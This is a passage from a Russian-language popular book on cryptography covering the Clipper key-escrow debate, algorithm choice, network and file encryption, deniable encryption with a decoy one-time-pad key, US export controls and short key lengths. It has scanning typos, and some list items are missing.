После заявления американского правительства о планах внедрения Стандарта шифрования данных с депонированием ключа вокруг крошечной кремниевой пластинки по имени Clipper разразился политический конфликт такой силы, что в печати ее вскоре окрестили "Боснией телекоммуникаций". В непримиримой схватке лицом к лицу сошлись защитники национальном безопасности США и поборники гражданских свобод вместе с поставщиками информационных технологий.
Правительственные агентства США, особенно АНБ, убеждали законодателей в том, что если использование стойких криптосистем станет повсеместным, это даст возможность преступникам и враждебно настроенным странам мешать расследованию их противоправной деятельности. Сторонники депонирования ключей резонно напоминали о том, что успехи криптоаналитических спецслужб англо-американских союзников в значительной мере способствовали достижению победы во второй мировой войне. Важная роль. которую криптоанализ играл в обеспечении безопасности страны, была впоследствии подтверждена и американским послевоенным законодательством. установившим контроль над экспортом шифраторов по тем же правилам, которые действовали в отношении поставок военного снаряжения. Примеру США последовали все государства, производящие коммерческие программы шифрования, причем некоторые из них (Израиль, Россия и Франция) также стали осуществлять контроль над импортом шифровальных средств и их использованием внутри страны.
Кроме того, в ходе "холодной" войны АНБ неуклонно повышало свой шпионский потенциал. Соответственно росло его влияние на политическую жизнь страны. К началу 90-х годов АНБ превратилось в монстра, внушавшего американским политикам и законодателям благоговейный страх. Для них мнение руководства АНБ было намного весомее возражений его оппонентов. А директор АНБ и его помощники неустанно твердили о том. что недоверие к Стандарту шифрования данных с депонированием ключей вызвано, главным образом, его незнанием. И в этом была доля правды, поскольку значительная часть проекта с самого начала хранилась в строгой тайне, включая сам алгоритм под условным названием Skipjack (Попрыгунчик), используемый для шифрования сообщений.
Со своей стороны, борцы за гражданские права в США посчитали решение. предложенное американской администрацией, еще большим злом, чем проблемы, с которыми приходилось сталкиваться в борьбе с преступностью и терроризмом. По их мнению, это предложение создавало основу для превращения национальной информационной инфраструктуры США в систему тотальной слежки, которая могла быть использована практически бесконтрольно.
Сказано круто. Однако несмотря на их экстремизм, борцов за гражданские права поддержали американские бизнесмены, для которых повсеместное внедрение депонирования ключей представлялось слишком сильнодействующим лекарством против преступности и терроризма. Ведь в качестве побочного эффекта оно было способно серьезно задержать развитие американской информационной инфраструктуры. Стандарт шифрования, базирующийся на секретной технологии и обеспечивающий американцам возможность доступа к каналам связи, которые этот стандарт предназначен защищать, вряд ли может рассчитывать на принятие за пределами США. Для сохранения ведущей позиции США на мировом рынке требуются разработка и поддержка общедоступных стандартов защиты информации, которые и равной мере обеспечивают интересы всех без исключения сторон.
Много неясностей было связано с системой передачи ключей на .хранение. Управляющие банками, компьютерными фирмами и представители других отраслей почти в один голос заявили, что покуда ключи находятся у правительства, игра ведется не по правилам. Некоторые из них даже предложили отдавать ключи в руки неправительственных организаций, как это делается. например, в Австралии и Канаде.
Кроме того, депонирование ключей обладает одним неустранимым дефектом. Хорошая практика защиты сообщений с помощью шифрования состоит в том, чтобы хранить ключи к шифрам только в течение короткого периода времени, пока эти ключи действительно нужны. Затем устаревшие ключи уничтожаются, после чего вероятность их воссоздания практически равна нулю. Предложение передавать ключи на хранение лишает шифрование этого преимущества, поскольку требует, чтобы ключи хранились бесконечно долго и могли быть использованы для прочтения более ранних шифрованных сообщений.
В настоящее время несколько влиятельных американских компаний занимаются разработкой и внедрением альтернативных правительственным систем надежного копирования ключей и хранения полученных копий в интересах корпораций и индивидуальных пользователей. Ведь многие из них сталкиваются с проблемой доступа к зашифрованным файлам, когда их работники скоропостижно умирают, увольняются, уезжают в отпуск, заболевают или просто бесследно исчезают. Различие между передачей копий ключей правительству и хранением их в частном агентстве может для кого-то показаться несущественным, но для корпораций эта разница может быть решающей.
Коммерческие программные средства со встроенным депонированием ключей шифруют файлы, используя стандартные алгоритмы шифрования, и завершают эту процедуру добавлением зашифрованной копии использованного ключа в полученный файл. Шифрование ключа производится с помощью другого ключа. Как правило, это открытый ключ службы депонирования. После этого обеспечить доступ к информации в файле могут либо владелец исходного ключа, который был использован для шифрования файла, либо частное агентство, где хранится соответствующий секретный ключ, который был применен для шифрования исходного ключа.
О своей готовности выступить в качестве держателей депонированных секретных ключей заявили многие американские компании, производящие программное обеспечение. Но у них неожиданно появились серьезные конкуренты: расширить пределы своей компетенции до хранения секретных криптографических ключей собрались банки.
Таким образом, в конкурентную борьбу за право хранить у себя резервные копии ключей к чужим шифрам вступили правительство, частные фирмы. банки. Кто из них станет победителем в этом соревновании, — пока неясно. Вероятно, будет найден какой-то компромиссный вариант, который удовлетворит все соревнующиеся стороны.
Глава 8. Надежность криптосистем
Как выбрать хороший криптографический алгоритм
Безопасность криптосистем можно сравнить с надежностью цепи: чем крепче ее самое слабое звено, тем труднее порвать эту цепь. В хорошей криптосистеме должно быть досконально проверено все — алгоритм, протокол. ключи и т. п. Если криптографический алгоритм достаточно стоек, а генератор случайных чисел, используемый для порождения ключей, никуда не годится, любой опытный криптоаналитик в первую очередь обратит внимание именно на него. Если удастся улучшить генератор, но не будут зачищены ячейки памяти компьютера после того, как в них побывал сгенерированный ключ, грош цена такой безопасности.
Рассмотрим следующую ситуацию. В криптосистеме применяются стойкий криптографический алгоритм и действительно случайные ключи, которые аккуратно удаляются из памяти компьютера после их использования. Однако перед шифрованием файл, в котором наряду с вашим адресом и фамилией указаны все ваши доходы за текущий год, был по ошибке отправлен электронной почтой в налоговую службу. В этом случае можно спросить. зачем тогда вам понадобились и стойкий алгоритм, и случайные ключи, и зачистка компьютерной памяти в придачу?!
Криптографу не позавидуешь: в проектируемой им криптосистеме он должен предусмотреть защиту от атак всех типов, какие только сможет придумать воспаленное воображение криптоаналитика. Криптоаналитику же наоборот достаточно отыскать единственное слабое звено в цепи криптографической зашиты и организовать атаку только против этого звени.
Кроме этого, всегда следует учитывать, что на практике угроза информационной безопасности любого объекта исходит не только от криптоаналитика. В конце концов, каким бы длинным ни был криптографический ключ, используемый вами для шифрования файлов, все равно, если правоохранительным органам понадобится узнать, что хранится в вашем компьютере. они просто установят камеру и скрупулезно запишут всю информацию, появляющуюся на его экране. Недаром, по признанию официальных лип из АНБ, большинство сбоев в обеспечении информационной безопасности происходит не из-за найденных слабостей в криптографических алгоритмах и протоколах, а из-за вопиющих оплошностей при их реализации. Какой бы стойкостью ни обладал криптографический алгоритм, ее не требуется преодолевать в лоб, т. к. при успешной атаке ее удается попросту обойти. Однако и пренебрегать хорошими криптографическими алгоритмами тоже не следует, чтобы криптография не стала самым слабым звеном в цепи, которое не выдержит напора атакующего.
При выборе хорошего криптографического алгоритма можно:
Все перечисленные варианты имеют существенные изъяны. Не следует полагаться только на одну фирму, на одного эксперта или на одно ведомство. Многие люди, называющие себя независимыми экспертами, мало понимают в криптографии. Большинство фирм, производящих средства шифрования, — тоже ничуть не лучше. В АНБ и ФАПСИ работают лучшие криптографы в мире, однако по понятным соображениям они не спешат поделиться своими секретами с первым встречным. Впрочем, и со вторым тоже. И даже если вы гений в области криптографии, глупо использовать криптографический алгоритм собственного изобретения без того, чтобы его всесторонне не проанализировали и не протестировали опытные криптологи.
Поэтому наиболее предпочтительной представляется первая из перечисленных возможностей. Данный подход к оценке стойкости криптографических алгоритмов можно было бы признать идеальным, если бы не один его не- достаток. К сожалению, ничего не известно о результатах криптоаналитических исследований этих алгоритмов, которые несомненно активно велись в .прошлом и продолжают также активно проводиться во всем мире многочисленными сотрудниками различных правительственных ведомств, в компетенцию которых входят криптологические изыскания. Эти ведомства, скорее ; всего, гораздо лучше финансируются, чем академические институты, ведущие аналогичные исследования. Да и начали они заниматься криптологией значительно раньше, чем ученые, не имеющие воинских званий, и специалисты из частных фирм. Поэтому можно предположить, что военные нашли гораздо более простые способы вскрытия известных шифров, нежели те, которые изобретены за пределами строго охраняемых зданий сверхсекретных правительственных ведомств.
Ну и пусть. Даже если вас арестуют и в качестве улики конфискуют у вас жесткий диск с файлами, зашифрованными по DES-алгоритму. вряд ли криптоаналитики, состоящие на государственной службе, придут на судебное заседание, чтобы клятвенно подтвердить, что данные для вашего обвинительного заключения получены путем дешифрования конфискованных файлов. Тот факт, что можно вскрыть какой-то конкретный криптографический алгоритм, часто является значительно большим секретом, чем информация, полученная путем вскрытия этого алгоритма.
Лучше исходить из предположения, что АНБ, ФАПСИ и иже с ними могут , прочесть любое сообщение, которое они пожелают прочесть. Однако эти ведомства не в состоянии читать все сообщения, с содержанием которых хотят ознакомиться. Главной причиной является ограниченность в средствах, ассигнуемых правительством на криптоанализ. Другое разумное предположение состоит в том, что компетентным органам гораздо легче получить доступ к зашифрованной информации с помощью грубой физической силы, чем путем изящных, но очень трудоемких математических выкладок, приводящих к вскрытию шифра.
Однако в любом случае гораздо надежнее пользоваться известным криптографическим алгоритмом, который придуман уже довольно давно и сумел выстоять против многочисленных попыток вскрыть его, предпринятых авторитетными криптологами.
Криптографические алгоритмы, предназначенные для экспорта из США
В настоящее время у пользователей персональных компьютеров имеется возможность применять алгоритмы шифрования, встроенные в различные программные продукты. Достаточно приобрести, например, текстовый редактор Word, редактор электронных таблиц Excel или операционные системы Windows NT и NetWare. Кроме встроенных алгоритмов шифрования, все эти программные продукты имеют еще одно общее свойство: они изготовлены в Соединенных Штатах. Прежде чем начать торговать ими за рубежом, американские производители в обязательном порядке должны получить разрешение у своего правительства на экспорт данных продуктов за пределы США.
Многие придерживаются сейчас такого мнения: ни один криптографический алгоритм, разрешенный к экспорту из США, не является достаточно стойким, чтобы его не могли вскрыть криптоаналитики из АНБ. Считается, что американские компании, желающие продавать за рубежом свою продукцию, которая позволяет шифровать данные, по настоянию АНБ переделывают используемые криптографические алгоритмы так, что:
Исходные тексты американских шифровальных программ передаются на хранение в АНБ, однако за пределами этого сверхсекретного агентства доступ к ним закрыт наглухо. Вполне естественно, что ни АНБ, ни американские компании, получившие от АНБ разрешение на экспорт своих шифровальных средств, не заинтересованы в рекламе слабостей криптографических алгорт-мов, положенных в основу функционирования этих средств. Поэтому желательно проявлять осторожность, если вы собираетесь защищать свои данные при помощи американских программ шифрования, экспорт которых за пределы страны разрешен правительством США.
Симметричный или асимметричный криптографический алгоритм?
Какой алгоритм лучше — симметричный или асимметричный? Вопрос не вполне корректен, поскольку предусматривает использование одинаковых критериев при сравнении криптосистем с секретным и открытым ключами. А таких критериев просто не существует.
Тем не менее, дебаты относительно достоинств и недостатков двух основных видов криптосистем ведутся давно, начиная с момента изобретения первого алгоритма с открытым ключом. Отмечено, что симметричные криптографические алгоритмы имеют меньшую длину ключа и работают быстрее, чем асимметричные.
Однако, по мнению американского криптолога У. Диффи — одного из и изобретателей криптосистем с открытым ключом— их следует рассматривав не как совершенно новую разновидность универсальных криптосистем. Криптография с открытым ключом и криптография с секретным ключом предназначены для решения абсолютно разных проблем, связанных с засекречиванием информации. Симметричные криптографические алгоритмы служат для шифрования данных, они работают на несколько порядком быстрее, чем асимметричные алгоритмы. Однако криптография с открытым ключом успешно используется в таких областях, для которых криптография с секретным ключом подходит плохо, — например, при работе с ключами и с подавляющим большинством криптографических протоколов.
Шифрование в каналах связи компьютерной сети
Одной из отличительных характеристик любой компьютерной сети является ее деление на так называемые уровни, каждый из которых отвечает за соблюдение определенных условий и выполнение функций, необходимых для общения между компьютерами, связанными в сеть. Это деление на уровни имеет фундаментальное значение для создания стандартных компьютерных сетей. Поэтому в 1984 г. несколько международных организаций и коми готов объединили свои усилия и выработали примерную модель компьютерной сети, известную под названием OSI (Open . Systems Interconnection — Модель открытых сетевых соединений).
Согласно модели OSI коммуникационные функции разнесены по уровням. Функции каждого уровня независимы от функций ниже- и вышележащих уровней. Каждый уровень может непосредственно общаться только с двумя соседними. Модель OSI определяет 7 уровней: верхние 3 служат для связи с конечным пользователем, а нижние 4 ориентированы на выполнение коммуникационных функций в реальном масштабе времени.
Теоретически шифрование данных для передачи по каналам связи компьютерной сети может осуществляться на любом уровне модели OSI. На практике" это обычно делается либо на самых нижних, либо на самых верхних уровнях. Если данные шифруются на нижних уровнях, шифрование называется канальным, а если на верхних, то такое шифрование называется сквозным. Оба этих подхода к шифрованию данных имеют свои преимущества и недостатки.
Канальное шифрование
При канальном шифровании шифруются абсолютно все данные, проходящие по каждому каналу связи, включая открытый текст сообщения, а также информацию о его маршрутизации и об используемом коммуникационном протоколе. Однако в этом случае любой интеллектуальный сетевой узел (например, коммутатор) будет вынужден расшифровывать входящий поток данных, чтобы соответствующим образом его обработать, снова зашифровать и передать на другой узел сети.
Тем не менее канальное шифрование представляет собой очень эффективное средство защиты информации в компьютерных сетях. Поскольку шифрованию подлежат все данные, передаваемые от одного узла сети к другому, у криптоаналитика нет никакой дополнительной информации о том, кто служит источником этих данных, кому они предназначены, какова их структура и т. д. А если еще позаботиться и о том, чтобы, пока канал простаивает, передавать по нему случайную битовую последовательность, сторонний наблюдатель не сможет даже сказать, где начинается и где заканчивается текст передаваемого сообщения.
Не слишком сложной является и работа с ключами. Одинаковыми ключами следует снабдить только два соседних узла сети связи, которые затем могут менять используемые ключи независимо от других пар узлов.
Самый большой недостаток канального шифрования заключается в том, что данные приходится шифровать при передаче по каждому физическому каналу компьютерной сети. Отправка информации в незашифрованном виде по какому-то из каналов ставит под угрозу обеспечение безопасности всей сети. В результате стоимость реализации канального шифрования в больших сетях может оказаться чрезмерно высокой.
Кроме того, при использовании канального шифрования дополнительно потребуется защищать каждый узел компьютерной сети, по которому передаются данные. Если абоненты сети полностью доверяют друг другу и каждый ее узел размещен там, где он защищен от злоумышленников, на этот недостаток канального шифрования можно не обращать внимания. Однако на практике такое положение встречается чрезвычайно редко. Ведь в каждой фирме есть конфиденциальные данные, знакомиться с которыми могут только сотрудники одного определенного отдела, а за его пределами доступ к этим данным необходимо ограничивать до минимума.
Сквозное шифрование
При сквозном шифровании криптографический алгоритм реализуется на одном из верхних уровней модели OSI. Шифрованию подлежит только содержательная часть сообщения, которое требуется передать по сети. После зашифрования к ней добавляется служебная информация, необходимая для маршрутизации сообщения, и результат переправляется на более низкие уровни с целью отправки адресату.
Теперь сообщение не требуется постоянно расшифровывать и зашифровывать при прохождении через каждый промежуточный узел сети связи. Сообщение остается зашифрованным на всем пути от отправителя к получателю.
Основная проблема, с которой сталкиваются пользователи сетей, где применяется сквозное шифрование, связана с тем, что служебная информация. используемая для маршрутизации сообщений, передается по сети в незашифрованном виде. Опытный криптоаналитик может извлечь для себя массу полезной информации, зная кто с кем, как долго и в какие часы общается через компьютерную сеть. Для этого ему даже не потребуется быть в курсе предмета общения.
По сравнению с канальным, сквозное шифрование характеризуется более сложной работой с ключами, поскольку каждая пара пользователей компьютерной сети должна быть снабжена одинаковыми ключами, прежде чем они смогут связаться друг с другом. А поскольку криптографический алгоритм реализуется на верхних уровнях модели OSI, приходится также сталкиваться со многими существенными различиями в коммуникационных протоколах и интерфейсах в зависимости от типов сетей и объединяемых в сеть компьютеров. Все это затрудняет практическое применение сквозного шифрования.
Комбинированное шифрование
Комбинация канального и сквозного шифрования данных в компьютерной сети обходится значительно дороже, чем каждое из них по отдельности. Однако именно такой подход позволяет наилучшим образом защитить данные, передаваемые по сети. Шифрование в каждом канале связи не позволяет противнику анализировать служебную информацию, используемую для маршрутизации. А сквозное шифрование уменьшает вероятность доступа к незашифрованным данным в узлах сети.
При комбинированном шифровании работа с ключами ведется так: сетевые администраторы отвечают за ключи, используемые при канальном шифровании, а о ключах, применяемых при сквозном шифровании, заботятся сами пользователи.
На первый взгляд, шифрование файлов можно полностью уподобить шифрованию сообщений, отправителем и получателем которых является одно и то же лицо, а средой передачи служит одно из компьютерных устройств хранения данных (магнитный или оптический диск, магнитная лента, оперативная память). Однако все не так просто, как кажется на первый взгляд.
Если при передаче по коммуникационным каналам сообщение затеряется по пути от отправителя к получателю, его можно попытаться передать снова. При шифровании данных, предназначенных для хранения в виде компьютерных файлов, дела обстоят иначе. Если вы не в состоянии расшифровать свой файл, вам вряд ли удастся сделать это и со второй, и с третьей, и даже с сотой попытки. Ваши данные будут потеряны раз и навсегда. Это означает, что при шифровании файлов необходимо предусмотреть специальные механизмы предотвращения возникновения ошибок в шифртексте.
Криптография помогает превратить большие секреты в маленькие. Вместо того чтобы безуспешно пытаться запомнить содержимое огромного файла, человеку достаточно его зашифровать и сохранить в памяти использованный для этой цели ключ. Если ключ применяется для шифрования сообщения, то его требуется иметь под рукой лишь до тех пор, пока сообщение не дойдет до своего адресата и не будет им успешно расшифровано. В отличие от сообщений, шифрованные файлы могут храниться годами, и в течение всего этого времени необходимо помнить и держать в секрете соответствующий ключ.
Есть и другие особенности шифрования файлов, о которых необходимо помнить вне зависимости от применяемого криптографического алгоритма:
Если файл представляет собой единое целое (например, содержит отрезок текста), восстановление этого файла в исходном виде не потребует больших усилий: перед использованием достаточно будет просто расшифровать весь файл. Однако если файл структурирован (например, разделен на записи и поля, как это делается в базах данных), то расшифровывание всего файла целиком каждый раз, когда необходимо осуществить доступ к отдельной порции данных, сделает работу с таким файлом чрезвычайно неэффективной. Шифрование порций данных в структурированном файле делает его уязвимым по отношению к атаке, при которой злоумышленник отыскивает в этом файле нужную порцию данных и заменяет ее на другую по своему усмотрению.
У пользователя, который хочет зашифровать каждый файл, размешенный на жестком диске компьютера, имеются две возможности. Если он использует один и тот же ключ для шифрования всех файлов, то впоследствии окажемся не в состоянии разграничить доступ к ним со стороны других пользователей. Кроме того, в результате у криптоаналитика будет много шифртекста, полученного на одном ключе, что существенно облегчит вскрытие этого ключа.
Лучше шифровать каждый файл на отдельном ключе, а затем зашифрован, все ключи при помощи мастер-ключа. Тем самым пользователи будут избавлены от суеты, связанной с организацией надежного хранения множества ключей. Разграничение доступа групп пользователей к различным файлам будет осуществляться путем деления множества всех ключей на подмножества и шифрования этих подмножеств на различных мастер-ключах. Стойкость такой криптосистемы будет значительно выше, чем в случае использования единого ключа для шифрования всех файлов на жестком диске, поскольку ключи, применяемые для шифрования файлов, можно генерировать случайным образом и, следовательно более стойкими против словарной атаки.
Аппаратное и программное шифрование
Аппаратное шифрование
Большинство средств криптографической защиты данных реализовано в виде специализированных физических устройств. Эти устройства встраиваются в линию связи и осуществляют шифрование всей передаваемой но ней информации. Преобладание аппаратного шифрования над программным обусловлено несколькими причинами.
Даже в компьютерах установка специализированного шифровального оборудования создает меньше проблем, чем модернизация системного программного обеспечения с целью добавления в него функций шифрования данных. В идеале шифрование должно осуществляться незаметно для пользователя. Чтобы добиться этого при помощи программных средств, средства шифрования должны быть упрятаны глубоко в недра операционной системы. С готовой и отлаженной операционной системой проделать это безболезненно не так-то просто. Но даже любой непрофессионал сможет подсоединить шифровальный блок к персональному компьютеру, с одной стороны, и к внешнему модему, с другой.
Современный рынок аппаратных средств шифрования информации предлагает потенциальным покупателям 3 разновидности таких средств — самодостаточные шифровальные модули (они самостоятельно выполняют всю работу с ключами), блоки шифрования в каналах связи и шифровальные платы расширения для установки в персональные компьютеры. Большинство устройств первого и второго типов являются узко специализированными. и поэтому прежде, чем принимать окончательное решение об их приобретении, необходимо досконально изучить ограничения, которые при установке накладывают эти устройства на соответствующее "железо", операционные системы и прикладное программное обеспечение. А иначе можно выбросить деньги на ветер, ни на йоту не приблизившись к желанной цели. Правда, иногда выбор облегчается тем, что некоторые компании торгуют коммуникационным оборудованием, которое уже имеет предустановленную аппаратуру шифрования данных.
Платы расширения для персональных компьютеров являются более универсальным средством аппаратного шифрования и обычно могут быть легко сконфигурированы таким образом, чтобы шифровать всю информацию, которая записывается на жесткий диск компьютера, а также все данные, пересылаемые на дискеты и в последовательные порты. Как правило, зашита от электромагнитного излучения в шифровальных платах расширения отсутствует, поскольку нет смысла защищать эти платы, если аналогичные меры не предпринимаются в отношении всего компьютера.
Программное шифрование
Любой криптографический алгоритм может быть реализован в виде соответствующей программы. Преимущества такой реализации очевидны: программные средства шифрования легко копируются, они просты в использовании, их нетрудно модифицировать в соответствии с конкретными потребностями.
Во всех распространенных операционных системах имеются встроенные средства шифрования файлов. Обычно они предназначены для шифрования отдельных файлов, и работа с ключами целиком возлагается на пользователя. Поэтому применение этих средств требует особого внимания. Во-первых, ни в коем случае нельзя хранить ключи на диске вместе с зашифрованными с их помощью файлами, а во-вторых, незашифрованные копии файлов необходимо удалить сразу после шифрования.
Конечно, злоумышленник может добраться до компьютера и незаметно внести нежелательные изменения в программу шифрования. Однако основная проблема состоит отнюдь не в этом. Если злоумышленник в состоянии проникнуть в помещение, где установлен компьютер, он вряд ли будет возиться с программой, а просто установит скрытую камеру в стене, подслушивающее устройство — в телефон или датчик для ретрансляции электромагнитного излучения — в компьютер. В конце концов, если злоумышленник может беспрепятственно все это сделать, сражение с ним проиграно, даже еще не начавшись.
Алгоритмы сжатия данных очень хорошо подходят для совместного использования с криптографическими алгоритмами. Тому есть две причины:
Надо только не забыть сжать файл до того, как он будет зашифрован. После шифрования файла при помощи качественного криптографического алгоритма полученный шифртекст сжать не удастся, поскольку его характеристики будут близки к характеристикам совершенно случайного набора букв. Кстати, сжатие может служить своеобразным тестом для проверки качества криптографического алгоритма: если шифртекст поддается сжатию, значит этот алгоритм лучше заменить на более совершенный.
Антон и Борис несколько месяцев обменивались шифрованными сообщениями. Контрразведка перехватила все эти сообщения, но так и не смогла прочесть ни единого слова. Контрразведчикам надоело коллекционировать переписку Антона и Бориса, не зная ее содержания, и они решили арестовать подозрительную парочку. Первый же допрос начался словами: "Где ключи к шифру?" "К какому такому шифру?!" — в один голос воскликнули Антон и Борис, но тут же осеклись и побледнели, заметив на столе у следователя зловещего вида клещи, покрытые пятнами то ли ржавчины, то ли крови.
Антон и Борис смогли бы выкрутиться из создавшегося положения, если бы шифровали каждое свое сообщение так, чтобы оно допускало два различных расшифрования в зависимости от используемого ключа. Свое настоящее секретное сообщение Борису Антон мог бы зашифровать на одном ключе, а вполне невинный открытый текст — на другом. Теперь, если от Антона потребуют ключ к шифру, он отдаст подставной ключ, который позволит прочесть невинное сообщение, а другой ключ сохранит в тайне.
Самый простой способ сделать это потребует использования одноразового блокнота. Пусть Р — секретный открытый текст, D — невинный открытый текст, С — шифрованный текст, К — настоящий ключ, а К — подставной ключ. Антон шифрует Р:
Р Å К = С
Поскольку у Бориса имеется копия ключа К, он может без проблем расшифровать сообщение Антона:
С Å К = Р
Если контрразведчики попытаются заставить Антона и Бориса выдать используемый ими ключ, то вместо К они могут сообщить в контрразведку:
К '= С Å D
В результате контрразведчики смогут прочитать невинный открытый текст:
С Å К ' = D
Так как Антон и Борис пользуются одноразовым блокнотом, то К является полностью случайным и доказать, что К является подставным ключом, практически невозможно (не прибегая к пыткам).
Антон мог бы зашифровать Р не с помощью одноразового блокнота, а пользуясь любым из своих самых любимых криптографических алгоритмов и ключом К. Сложив С с фрагментом какого-либо общеизвестного произведения (например, с отрывком из второй главы "Идиота") по модулю 2, Антон получит К'. Теперь если к Антону пристанут злые "дяденьки" из контрразведки, он предъявит им С вместе с К' и скажет, что К' — это одноразовый блокнот для С и что он просто захотел попрактиковаться н криптографии, зашифровав для этой цели отрывок из первой попавшейся книги. И пока контрразведчики не получат в свое распоряжение ключ К, доказать, что Антон занимался чем-то противозаконным, они не смогут.
В настоящее время криптография успешно используется почти во всех информационных системах — от Internet до баз данных. Без нее обеспечить требуемую степень конфиденциальности в современном, до предела компьютеризированном мире уже не представляется возможным. Кроме того, с помощью криптографии предотвращаются попытки мошенничества в системах электронной коммерции и обеспечивается законность финансовых сделок. Со временем значение криптографии, по всей вероятности, возрастет. Для этого предположения имеются веские основания.
Однако с огорчением приходится признать, что подавляющее большинство криптографических систем не обеспечивает того высокого уровня зашиты, о котором с восторгом обычно говорится в их рекламе. Многие из них до сих пор не были взломаны по той простой причине, что пока не нашли широкого распространения. Как только эти системы начнут повсеместно применяться на практике, они, словно магнит, станут привлекать пристальное внимание злоумышленников, которых сегодня развелось великое множество. При этом удача и везение будут явно на стороне последних. Ведь для достижения своих целей им достаточно найти в защитных механизмах всего лишь одну брешь, а обороняющимся придется укреплять все без исключения уязвимые места.
Реализация
Понятно, что никто не в состоянии предоставить стопроцентную гарантию безопасности. Тем не менее, криптографическую защиту без особых усилий можно спроектировать так, чтобы она противостояла атакам злоумышленников вплоть до того момента, когда им станет проще добыть желаемую информацию другим путем (например, с помощью подкупа персонала или внедрения программ-шпионов). Ведь криптография действительно хороша именно тем, что для нее уже давно придуманы эффективные алгоритмы и протоколы, которые необходимы, чтобы надежно защитить компьютеры и компьютерные сети от электронного взлома и проявлений вандализма.
Вот почему в реальной жизни криптографические системы редко взламываются чисто математическими методами. Ведь криптографический алгоритм или протокол от его практической реализации в виде работающей программы, как правило, отделяет зияющая пропасть. Даже доказанный по всем правилам формальной логики факт, что криптографическая зашита совершенна с математической точки зрения, совсем не означает, что она останется таковой после того, как над ее внедрением поработают программисты.
Известно, что под давлением бюджетных ограничений, дефицита времени и личных неурядиц программисты неизбежно допускают весьма серьезные ошибки при реализации алгоритмов — используют плохие датчики случайных чисел для генерации криптографических ключей, не учитывают специфику аппаратной среды, в которой предстоит эксплуатировать созданные ими программные средства, а также регулярно забывают удалять ключевую и другую секретную информацию из оперативной памяти компьютера или с магнитного носителя после того, как надобность в ее хранении там отпала. Единственный способ научиться избегать этих и им подобных ошибок состоит в том. чтобы вновь и вновь стараться создать совершенные системы криптографической защиты данных, а потом не менее упорно пытаться их взломать.
Конечно, после того как брешь в системе криптографической защиты найдена, ее довольно легко можно залатать. Но сам поиск подобного рода дефектов является невероятно сложной задачей. Никакое предварительное тестирование не поможет обнаружить в криптографической системе все дефекты, поскольку ни один тест в отдельности не может дать полной гарантии их отсутствия. Ведь если программа шифрования правильно зашифровывает и расшифровывает файлы, это еще совсем не значит, что она надежно защищает их содержимое.
Учет реальных потребностей пользователей
Немало проблем, связанных с использованием криптографических средств, создают сами пользователи. Безопасность заботит их меньше всего. В первую очередь им требуются простота, удобство и совместимость с уже существующими (как правило, недостаточно защищенными) программными продуктами. Они выбирают легко запоминающиеся криптографические ключи, записывают их где попало, запросто делятся ими с друзьями и знакомыми. Поэтому грамотно спроектированная криптографическая система обязательно должна принимать во внимание специфические особенности поведения людей.
Еще труднее оказывается убедить людей в необходимости строго и неукоснительно применять криптографическую защиту данных. Пользователи с готовностью приносят в жертву собственную безопасность, если средства ее обеспечения мешают им поскорее сделать свою работу. Поэтому только в случае, если при проектировании криптографической системы были учтены реальные потребности пользователей, она действительно в состоянии защитить их компьютеры и компьютерные сети.
Законодательные ограничения
В Своде законов США имеется пункт 2778, который называется "Контроль за экспортом и импортом вооружений". Именно этот пункт является юридической основой для ряда инструкций, именуемых "Правилами контроля за перемещением оружия в мире" (International Traffic in Arms Regulations, сокращенно— 1TAR). Раздел 120.1 ITAR впрямую причисляет к военному снаряжению, за перемещением которого Соединенные Штаты осу шести, (я ют самый строгий контроль, программное обеспечение, предназначенное для целей эффективного шифрования данных. А это означает, что американским компаниям, желающим экспортировать программы эффективной) шифрования, необходимо зарегистрироваться в Государственном департаменте США в качестве торговца военным имуществом и получить там лицензию на экспорт.
Известно, что при выдаче таких лицензий Госдепартамент целиком и полностью полагается на мнение АНБ. В результате лицензия на экспорт криптографических средств никому не выдается до тех пор, пока АНБ не одобрит такое решение. В свою очередь, АНБ отнюдь не заинтересовано в свободном распространении надежных программ шифрования за пределами страны. Поэтому все программные средства, произведенные в США и легально экспортируемые за рубеж, обеспечивают ослабленную криптографическую защиту.
Чтобы повысить свою конкурентоспособность на мировом рынке, производители средств криптографической защиты в США вынуждены искать лазейки в законодательстве. Например, известная американская фирма RSA Data Security попыталась обойти закон путем финансирования усилии китайских ученых, которых правительство Китая официально уполномочило разработать новые программные средства шифрования данных. Предполагалось, что эти средства, созданные на основе алгоритмов, переданных американской фирмой китайцам, смогут обеспечить более надежную криптографическую защиту информации, чем те, которые Китай в состоянии импортировать из США в соответствии с действующим американским законодательством. Это, несомненно, радостное событие для Китая, однако следует отметить, что ради удовлетворения потребностей рядового пользователя за рубежом, не обладающего возможностями и ресурсами, сравнимыми с теми, которые имеются в распоряжении китайского правительства, американские производители программ эффективного шифрования вряд ли будут искать какие-либо пути, ведущие в обход американского законодательства.
Следуя примеру США, ряд государств, в том числе и Россия, ввели ограничения на экспорт, импорт и использование шифровальных средств. Тем не менее, многих российских граждан ничуть не пугают законодательные ограничения на эксплуатацию шифровальных средств. Они твердо придерживаются мнения о том, что принадлежащая им информация безусловно являемся объектом их собственности, и что они, как собственники своей информации, имеют право самостоятельно определять правила ее хранения и защиты. Остается только со знанием дела решить, какие именно шифровальные средства применять для адекватной защиты этой информации, а какие не использовать ни в коем случае, ввиду их слабой надежности.
Слишком малая длина ключа
Слишком малая длина ключа — одна из самых очевидных причин ненадежности криптографических систем. Причем недостаточную длину ключа могут иметь даже те криптосистемы, в которых применяются самые надежные алгоритмы шифрования, поскольку:
Первым надежным криптографическим алгоритмом, который вплотную столкнулся с проблемой выбора адекватной длины ключа, стал RSA. Дело в том, что его вскрытие требует разложения на множители (факторизации) очень больших чисел. В марте 1994 г. за вполне приемлемое время было факторизовано 428-битовое число, а на сегодняшний день достаточно реальным представляется факторизация 512-битовых чисел. Достигнутый прогресс в решении задачи факторизации очень больших чисел связан не только с ростом вычислительных мощностей современного компьютерного парка, но и с разработкой новых эффективных алгоритмов. На том, что эта задача является очень трудоемкой, еще совсем недавно была основана надежность криптографического алгоритма, используемого в распространенной программе PGP. Поэтому можно утверждать, что сегодня разложение на множители является одной из самых динамично развивающихся областей криптографии.
В начале 1998 г. из-за слишком малой длины ключа (56 бит) фактически "приказал долго жить" DES-алгоритм, долгое время являвшийся официальным стандартом шифрования данных в США. Сейчас американским Национальным институтом стандартов объявлен конкурс на новый стандарт шифрования данных Advanced Encryption Standard (AES). Согласно условиям этого конкурса, кандидаты на роль AES должны представлять собой симметричные алгоритмы шифрования с ключом длиной более 128 бит.
Потайные ходы
